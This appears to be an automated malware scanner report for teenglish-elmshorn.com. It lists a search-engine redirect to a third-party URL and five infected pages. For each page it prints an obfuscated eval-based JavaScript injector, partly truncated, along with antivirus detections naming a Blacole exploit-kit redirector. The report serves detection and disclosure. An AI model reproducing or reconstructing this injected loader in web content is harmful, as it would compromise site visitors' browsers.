New scan:

Malware Scanner report for teenglish-elmshorn.com

Malicious/Suspicious/Total urls checked
5/0/7
5 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://www.wordimpressive.com/connections/clik.php
71 websites infected.

The website "teenglish-elmshorn.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.teenglish-elmshorn.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.teenglish-elmshorn.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 19:41:23 GMT
Location: http://www.wordimpressive.com/Connections/clik.php
Server: Apache
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://www.teenglish-elmshorn.com/
200 OK
Content-Length: 10417
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=100;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,100,107,108,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,97,109,110,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,11
... 916 bytes are skipped ...
4,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,97,109,110,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,97,109,110,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,100,107,108,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://www.teenglish-elmshorn.com/jquery-1.4.2.min.js
200 OK
Content-Length: 74550
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=131;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,107,97,93,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,104,99,95,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,113,1
... 908 bytes are skipped ...
23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,104,99,95,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,104,99,95,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,107,97,93,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://maps.google.com/maps/api/js?sensor=false&language=de®ion=DE
200 OK
Content-Length: 4950
Content-Type: text/javascript
clean
http://www.teenglish-elmshorn.com/teenglish.v3.js
200 OK
Content-Length: 6427
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=131;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,107,97,93,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,104,99,95,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,113,1
... 908 bytes are skipped ...
23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,104,99,95,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,104,99,95,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,107,97,93,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://s7.addthis.com/js/250/addthis_widget.js
200 OK
Content-Length: 6875
Content-Type: text/javascript
clean
http://www.teenglish-elmshorn.com/privacy.html
200 OK
Content-Length: 10385
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=25;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,112,102,113,106,113,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,6,4,27,23,24,25,111,106,112,105,112,40,110,105,91,25,55,27,30,96,109,110,107,49,39,40,11
... 1023 bytes are skipped ...
,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,112,102,113,106,113,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,109,104,115,108,110,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,109,104,115,108,110,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-512!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://www.teenglish-elmshorn.com/test404page.js
200 OK
Content-Length: 10067
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=100;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,100,107,108,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,97,109,110,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,11
... 916 bytes are skipped ...
4,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,97,109,110,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,97,109,110,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,100,107,108,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=teenglish-elmshorn.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://teenglish-elmshorn.com/

Result: teenglish-elmshorn.com is not infected or malware details are not published yet.